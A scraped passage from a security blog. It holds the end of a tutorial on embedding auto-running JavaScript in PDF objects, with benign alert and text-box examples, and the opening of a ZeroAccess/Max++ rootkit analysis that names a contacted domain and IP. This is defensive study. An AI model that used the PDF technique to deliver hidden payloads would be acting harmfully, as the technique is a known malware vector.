<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As you can see in the figure above, object 6 has the JavaScript tag and points to the object 7. That is all we need to include for the first object. The second object will be another pointer. It will include the “Name” tag and this allows us to name the JavaScript code we will introduce to the PDF document. As you can see we have a reference to the third object which is object number 8. The name I give the JavaScript code I will introduce is “My Code”.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVIsvrrWugm9sNakb7tA_bey5cmFqnquSsMEZT3kpii8SOVvLh5Oza0biqrbVblLLxhyR-QZEs53lii7oDxwH6oi64FGudCsiScm3K2gFzjc-_TjEL5EDyJcNtG4SvXxlezuJs0EnGi-n4/s1600/Figure1-3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVIsvrrWugm9sNakb7tA_bey5cmFqnquSsMEZT3kpii8SOVvLh5Oza0biqrbVblLLxhyR-QZEs53lii7oDxwH6oi64FGudCsiScm3K2gFzjc-_TjEL5EDyJcNtG4SvXxlezuJs0EnGi-n4/s1600/Figure1-3.PNG" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The third object I need to introduce to embed JavaScript is an object with the actual JavaScript code. In my example this is object number 8.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaUIp7VpheMy0vsmqT6ZKjPt5I_0IkJzDcYec2e8HGJlg5sPihMLheIepVWIF6FO2JOCsGDdXzF9HbolWqZft67fJ_EnGQ_WB-Net7X01negkaBDuO5F3_1Abtp61X469nlMBilsq9twdE/s1600/Figure1-2(2).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaUIp7VpheMy0vsmqT6ZKjPt5I_0IkJzDcYec2e8HGJlg5sPihMLheIepVWIF6FO2JOCsGDdXzF9HbolWqZft67fJ_EnGQ_WB-Net7X01negkaBDuO5F3_1Abtp61X469nlMBilsq9twdE/s400/Figure1-2(2).PNG" width="400" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Object 8 has three tags we need to include. The first is the “/JS ” tag which stands for JavaScript and holds the JavaScript code we wish to run. In this example I utilize the app object and use the method alert. This allows me to display an alert box when the PDF is opened. “cMsg” defines the message I wish to display within the textbox and “cTitle” is the title header for the textbox. The second tag is “/S” which describes the action dictionary which leads to my third tag which is “/JavaScript”. </span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In order for my JavaScript to run we must make final adjustments to the PDF document. We must update the xref section of our document to account for the three new objects added.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZjiFcNvqF9lJT2oR4ENpObvjgvlrXBdnzr3cE1gwwmK8MYQSF075HjZGORuPnHL1JY4i8r8IvdUux6A1lciw-etB0Fv9vhyH9U91o6HqsQ0j7CmF2VuKxMlnrwitH_BQpNcjx5Qzp90uK/s1600/Figure1-5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZjiFcNvqF9lJT2oR4ENpObvjgvlrXBdnzr3cE1gwwmK8MYQSF075HjZGORuPnHL1JY4i8r8IvdUux6A1lciw-etB0Fv9vhyH9U91o6HqsQ0j7CmF2VuKxMlnrwitH_BQpNcjx5Qzp90uK/s1600/Figure1-5.PNG" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The x ref tag will now include 9 objects and the size tag will change to 9 as well. The last modification to make is in our catalog object which is our root object 1.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiROztrtfWxutY_Nb45Hqvbbchs7qhPTWGFtxpADtm16TUNjP63yK5Oq_5sIw_7lNKinx6FdKLHyldAovN_HsyunW26K80M1YdZxsC23LbuslIve60i14n678D4sJzlJceHdcmBsHDbQhG/s1600/Figure1-6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiROztrtfWxutY_Nb45Hqvbbchs7qhPTWGFtxpADtm16TUNjP63yK5Oq_5sIw_7lNKinx6FdKLHyldAovN_HsyunW26K80M1YdZxsC23LbuslIve60i14n678D4sJzlJceHdcmBsHDbQhG/s1600/Figure1-6.PNG" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We must include a reference to our JavaScript object which is object 6. We use the “/Name” tag to set the pointer. Now we have a fully functional PDF that will run the JavaScript when the document is opened. Below is a screenshot of the alert box that is produced by the JavaScript in my example.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Bcoawrez9vSITgJxq9_8mAEMiJbpH5pEJFb3n67gA1T2k0nbggVx4Q_nJmu28PTUcqKGLj1bSL4ns8SfOsl20IlQgMGF79UYf8pUCF9eUmjmE8TKOXD6dXracUV_P-uB4ldtDC59ZtXu/s1600/Figure1-7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Bcoawrez9vSITgJxq9_8mAEMiJbpH5pEJFb3n67gA1T2k0nbggVx4Q_nJmu28PTUcqKGLj1bSL4ns8SfOsl20IlQgMGF79UYf8pUCF9eUmjmE8TKOXD6dXracUV_P-uB4ldtDC59ZtXu/s400/Figure1-7.PNG" width="400" /></a></div><br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">3. TextBox Example</span><o:p></o:p></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Let us look at another example that uses JavaScript to introduce a text box into the PDF document. We can use the template from above and make one simple change to the JavaScript section. In order to modify our JavaScript we only need to change object 8.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1XM5QWoplTlrU0s1aG4PFeEcHGLvEObx2xl6gy00AjRfiT4N7QTuWoS6I_Da86PjBFeS_q33jkjletLMycTHar2bSAcIBcHUdNSfJr7W5Oi-u7PzAcsVh8Ui8ygD92iAweKzwJLjmFP_4/s1600/Figure1-8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1XM5QWoplTlrU0s1aG4PFeEcHGLvEObx2xl6gy00AjRfiT4N7QTuWoS6I_Da86PjBFeS_q33jkjletLMycTHar2bSAcIBcHUdNSfJr7W5Oi-u7PzAcsVh8Ui8ygD92iAweKzwJLjmFP_4/s400/Figure1-8.PNG" width="400" /></a></div><br />
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">Here we have the same tags and only modify what is inside the parenthesis. In order to add a text box I use the document object and gain access to it by using “this”. “this” is a pointer to the current document and I am able to create a text box by using the “addField” method. Line 64 shows how I implement this method. “addField” takes four parameters. The first is the name for my textbox and in my example it is simply “My Text Box”. The second parameter is the type of field we wish to add. Since we require a textbox I use “text”, however others such as button are also available. The third parameter is the page of the document. It is an index that begins at zero and since I want the textbox on the first page, the value of the parameter is 0. The last parameter is the position of the text box. Previously on line 63 I initialize the coordinates of the textbox. Position takes a list of four numbers, measuring the box from left-top corner, right-top corner, bottom-left corner, and bottom-right corner. After this change we have a document that produces a textbox from the JavaScript we just created. Below you can see a screenshot of the PDF example. In the upper-left corner is the </span><span style="font-size: 15px; line-height: 17px;">text box</span><span style="font-size: 11pt; line-height: 115%;"> that is displayed in gray.</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Sv9MUF8QbJ7lxruuBboVuLVweClOg_giZPX8fBYs0MYCwKk7RfUiZudgKbFsxS8w7vJLkuP9sStp4apW88bnDPVeO-7E6iJx2Pv_KBZ3_wLxa1ICy-HV5xxaTDhjGJ8ozNHx1vkRffgl/s1600/Figure1-9(2).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Sv9MUF8QbJ7lxruuBboVuLVweClOg_giZPX8fBYs0MYCwKk7RfUiZudgKbFsxS8w7vJLkuP9sStp4apW88bnDPVeO-7E6iJx2Pv_KBZ3_wLxa1ICy-HV5xxaTDhjGJ8ozNHx1vkRffgl/s640/Figure1-9(2).PNG" width="640" /></a></div><br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">4. Conclusion</span><o:p></o:p></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To sum up, we have two examples of how to incorporate JavaScript into a PDF document. I utilized JavaScript to display an alertbox and a textbox. Many more objects and methods can be controlled using JavaScript and the full reference can be found in Acrobat JavaScript Scripting Reference <a href="http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf" target="_blank">[1]</a>. In the next article I will continue to show how to extract JavaScript from a PDF and how to decode a PDF which is </span><span style="font-family: Calibri, sans-serif; font-size: 15px; line-height: 17px;">normally encoded with filters such as "flatDecode".</span><br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;"><br />
</span></div><div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">References</span><o:p></o:p></div><div style="margin-bottom: .0001pt; margin: 0in;"><span style="font-family: Calibri, sans-serif; font-size: 11pt;">[1] "Document Management - Portable Document Format", Available at<o:p></o:p></span></div><div style="margin-bottom: .0001pt; margin: 0in; text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt;"> <span style="color: windowtext; font-size: 12pt; text-decoration: none;"><a href="http://www.adobe.com/devnet/pdf/pdf_reference.html">http://www.adobe.com/devnet/pdf/pdf_reference.html</a></span><o:p></o:p></span></div><div style="margin-bottom: .0001pt; margin: 0in; text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt;">[2] "Acrobat JavaScript Scripting", Available at <o:p></o:p></span></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"> <span style="color: windowtext; text-decoration: none;"><a href="http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf">http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf</a></span></span>Unknownnoreply@blogger.com59tag:blogger.com,1999:blog-8501561183307667545.post-47639232754984518652012-02-20T19:08:00.001-08:002012-03-20T09:02:31.419-07:00ZeroAccess Rootkit - Part 1<span style="font-family: Calibri, sans-serif; font-size: large; line-height: 115%;"><b><u>Abstract:</u></b></span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">This series of articles will present an analysis of a rootkit named ZeroAccess. This malware, also known as Max++, is a devious piece of code that works on a kernel level to bypasses virus scanners and continues to evolve in each new release discovered in the wild. Throughout this series I will explore the INT 2D instruction, an anti-debugging technique that is employed by this malware. The INT 2D instruction causes a byte scission and is utilized by ZeroAccess to prevent accurate analysis of the malware and ultimately used to increase the lifespan of the program. Furthermore I will present experiments and results that show the dynamic behavior of the INT 2D instruction and what factors, including the debugging environment, will change execution. In the following articles I will also continue to reverse engineer the ZeroAccess malware and analyze how it manages to infect a computer driver, modify the export table, encode its own export table, create a hidden partition, and ultimately remain hidden while it takes control of a computer belonging to an unaware individual.</span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><br />
</span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: large; line-height: 115%;"><b>1. Background Information</b></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Malware stands for the term malicious software. Viruses, trojans, spyware and rootkits are all examples of malware. They are undesired and deceptive programs that are installed onto a victim’s computer without their consent. The goal of these programs is to exploit a computer for various reasons. One reason that hackers write and release malware is for reputation or personal curiosity. Currently, a more common motive is that malware is written by hackers for profit and financial gain. One example of this type of malware is the root kit named ZeroAccess. </span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><br />
</span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">ZeroAccess was first seen by VirusTotal on January 24, 2010. It is a very advanced rootkit that uses kernel calls and targets windows based machines. ZeroAccess utilizes undocumented system features and employs sophisticated anti-forensic techniques to avoid analysis and increase its lifespan. When a system is infected with ZeroAccess, the windows system files are modified and kernel hooks are created. After the hooks are in place, the program is now able to hide its processes and network connections. It also has the ability to avoid detection and removal by antivirus scanners. If a virus software attempts to access its files or processes, ZeroAccess immediately kills that service and disables the virus software.</span></div><span style="font-family: Calibri, sans-serif; line-height: 115%;"></span><br />
<div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large; line-height: 115%;"><b>2. Network Behavior</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><div class="MsoNormal" style="line-height: 150%;"><span style="font-family: Calibri, sans-serif; line-height: 115%;">Let us first analyze a system that is infected with the Max++ rootkit and check the network traffic of the compromised system. In order to safely run an instance of the malware, I set up a virtual environment with virtual box. I used two virtual systems, first a machine with the <i>Windows XP Service Pack 2 </i>operating system, and second a system running <i>Ubuntu</i>. I expected the Max++ malware to hide its communications in the Windows XP system so I routed all the network traffic from the Windows system to run through the Ubuntu system. In the Ubuntu system I utilized a packet sniffer called <i>Wireshark</i> to inspect all incoming and outgoing packets. My goal was to find any request that Max++ makes to contact a remote server. <span style="font-size: 11pt; line-height: 115%;">For the Windows machine I configured the system to use an internal network card in virtual box. Figure 1.1 displays my configuration for the windows guest machine.</span></span></div></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div class="separator" style="clear: both; font-size: 11pt; text-align: center;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><br />
</span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq7ZAGzRWs86MYJ90MyY_y06qsbNWb7vtdDPsPiSitwnKJFVB6PdTrS31sDj9HmPv1dcKUDFSNcufcn1sybWNJmu_YscDD41qksQp4un5_59kPBdMQlAtelcsw7Yna1ysIruFwstSeEXq5/s1600/Figure+1-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq7ZAGzRWs86MYJ90MyY_y06qsbNWb7vtdDPsPiSitwnKJFVB6PdTrS31sDj9HmPv1dcKUDFSNcufcn1sybWNJmu_YscDD41qksQp4un5_59kPBdMQlAtelcsw7Yna1ysIruFwstSeEXq5/s400/Figure+1-1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.1 - Network configuration for the Windows XP virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Also I enabled hardware virtualization because Max++ makes use of hardware breakpoints. <i>Figure 1.2</i> is the system configuration for my system.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0SAbXTJe_jxSRg01O1OPLaH6iOvBDGjZniCRP4sViobzEoHWPjJomnPA7Gg1Dn0NoWu9jmz8Wk9FZ4UCp3qirekct631vB-6-ZNUE0sEp9VMM_lzIde0Qm4y_MBCR49x2EqaCop5e-FGK/s1600/Figure+1-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0SAbXTJe_jxSRg01O1OPLaH6iOvBDGjZniCRP4sViobzEoHWPjJomnPA7Gg1Dn0NoWu9jmz8Wk9FZ4UCp3qirekct631vB-6-ZNUE0sEp9VMM_lzIde0Qm4y_MBCR49x2EqaCop5e-FGK/s400/Figure+1-2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.2 - System configuration for the Windows XP virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Second I configured the Ubuntu machine to use the internal network card and accept connections from the windows guest machine. Below are my settings for the Ubuntu machine.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvOEQZgUuIbP8BBUvt-tCULaL4l2bc7E73uotyxKPqnzuKq26dy-EVpxPqU-6XBVKBJ63p9GcJwHTp-Ii7G_zN18uxd07qI9wZd-KngabUCckYm1ni-q3I3OyZkMpIUhmPx7Rko9mK4na/s1600/Figure+1-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvOEQZgUuIbP8BBUvt-tCULaL4l2bc7E73uotyxKPqnzuKq26dy-EVpxPqU-6XBVKBJ63p9GcJwHTp-Ii7G_zN18uxd07qI9wZd-KngabUCckYm1ni-q3I3OyZkMpIUhmPx7Rko9mK4na/s400/Figure+1-3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.3 - Network configuration for adapter #1 in the Ubuntu virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">I also enabled the second network adapter in the Ubuntu system. This allows me access to the host internet connection. Below in <i>Figure 1.3</i> is my network setting for my Ubuntu machine.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkIOKegpIAUyu73COPDOMtLgSX_yjBhcIrgKgtnwMQt_6q20LDfbqBMBmpltLY3orN5axtyWzeveI2qYArFiLRAm67XaYddQMvA-UZRjpVJH20qjhMwepzxWwXhD_kkjPI30C2yr6q14U/s1600/Figure+1-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkIOKegpIAUyu73COPDOMtLgSX_yjBhcIrgKgtnwMQt_6q20LDfbqBMBmpltLY3orN5axtyWzeveI2qYArFiLRAm67XaYddQMvA-UZRjpVJH20qjhMwepzxWwXhD_kkjPI30C2yr6q14U/s400/Figure+1-4.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.4 - Network configuration for adapter #2 in the Ubuntu virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">In order to complete the setup of the two virtual systems I also had to set up the IP forwarding and find out the DNS server to gain internet connectivity. After I had the systems set up I was able to use <i>Wireshark</i> in the Ubuntu machine and monitor all network traffic from the windows system. An important note to make here is to always make a snapshot of the virtual system before the malware is run in order to restore the machine to an uninfected state. When the executable of the malware was run on the windows host, the executable disappeared and the malware deletes itself from the folder. At this point the system was infected and <i>Wireshark</i> allows us to observe any suspicious activity. In Figure 1.3 is the output of <i>Wireshark</i> after the Max++ is executed. There is a query for “intensedive.com”. Also a standard query response from the ip address 64.74.223.42.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlW6S2wTkgGm82PkCMmqu-doq8QeTawmsjMl4j1qBdPD7RBOPa9_BeiWxJ4FiXCBuTGsb0bRWcxFrcx2mGwPXOj1D-aHbmjXa5nIrXI5MxA1QueKxmY1R2_MF0GeiaTNY4F3iWTNDA_OdB/s1600/Figure+1-5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlW6S2wTkgGm82PkCMmqu-doq8QeTawmsjMl4j1qBdPD7RBOPa9_BeiWxJ4FiXCBuTGsb0bRWcxFrcx2mGwPXOj1D-aHbmjXa5nIrXI5MxA1QueKxmY1R2_MF0GeiaTNY4F3iWTNDA_OdB/s640/Figure+1-5.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.5 - Wireshark captures packets from the Windows XP system infected with Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">We can get more information on the IP address and domain name by using the “whois” or “tracert” command on a Linux terminal. Also this can also be done on many hosting sites that provide a DNS lookup. Giuseppe Bonfa [2] in his article provides a trace on the crime ware origins of the Max++ malware and links it to the Russian Syndicate Network, which is a known friendly environment for malware.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large; line-height: 115%;"><b>3. File System and Registry Behavior</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">In the previous section we saw how Max++ has the ability to silently transmit data. Let us now analyze what files and registry items are modified by the malware. A simple way to get an initial report on a malware is to use free web services like Annubis, GFISandbox, and VirusTotal. These three services allow for web submission of the sample file. Both Annubis and GFISandbox actually run the malware in an isolated environment. They provide you with a quick analysis of the malware. Below I provide results for the Max++ malware from VirusTotal, GFI Sandbox, and Annubis.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large; line-height: 115%;"><b>3.1 VirusTotal Results for Max++</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">I submitted the Max++ executable to VirusTotal and in <i>Figure 1.6</i> is the analysis summary. At the time of my submission 43 virus scanners were used by VirusTotal and 39 detected the file as malware. Also included in the summary is the SHA256 hash for the file as well. <i>Figure 1.7</i> we have a list of all the virus scanners used and which scanners detected the virus. Each scanner has its own signatures and this table shows the benefit of utilizing many virus scanners. Not all virus scanners may detect the file as a malware.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKPjp7ggJLeSRMDkRi8LVs98ebQEDtaxJ9-ShSBWpDH8nhwT1np7wdKxbxoBeurYjJoMNKnD9VXQ1y37B0LSp_3EEFMBA0b0DA6ScC_SmkE6zkTHf3Wv8ibNTHUsXpfYB376hJdqQiFv8/s1600/Figure+1-6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKPjp7ggJLeSRMDkRi8LVs98ebQEDtaxJ9-ShSBWpDH8nhwT1np7wdKxbxoBeurYjJoMNKnD9VXQ1y37B0LSp_3EEFMBA0b0DA6ScC_SmkE6zkTHf3Wv8ibNTHUsXpfYB376hJdqQiFv8/s640/Figure+1-6.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.6 - VirusTotal analysis summary for Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div class="separator" style="clear: both; font-size: 11pt; text-align: center;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtEMDJDam3LfCz7OiqhTWjzET_43AxRxgq03Z93kjWJWr2ireU6fCG6YnOFRw1mkCDl30N_FEvnEmB4d_DQ6pDV0S9GwFgIf34gBg35xH38MNgwY3zON85caCz2XLQJjmjmnmr8nA8tAfD/s1600/Figure+1-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="609" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtEMDJDam3LfCz7OiqhTWjzET_43AxRxgq03Z93kjWJWr2ireU6fCG6YnOFRw1mkCDl30N_FEvnEmB4d_DQ6pDV0S9GwFgIf34gBg35xH38MNgwY3zON85caCz2XLQJjmjmnmr8nA8tAfD/s640/Figure+1-7.png" width="640" /></a></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGpdiK884X0VsfMJywQyum62ePEqocTJBafaMyoillSLAMU3JVfTGKeZYldeYJsnNw-Ekf4HW_mNsre0NUm2xAq7pSVbjukdTFgBlGpUsyUbNFiWZ0oTI1qTPa8cf6WBA9elSzXCY7eeW/s1600/Figure+1-7+(2).png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGpdiK884X0VsfMJywQyum62ePEqocTJBafaMyoillSLAMU3JVfTGKeZYldeYJsnNw-Ekf4HW_mNsre0NUm2xAq7pSVbjukdTFgBlGpUsyUbNFiWZ0oTI1qTPa8cf6WBA9elSzXCY7eeW/s640/Figure+1-7+(2).png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.7 - List of antivirus scanners used by VirusTotal and the detection count</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Also provided by VirusTotal is a list of all the different filenames the malware has been submitted under.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
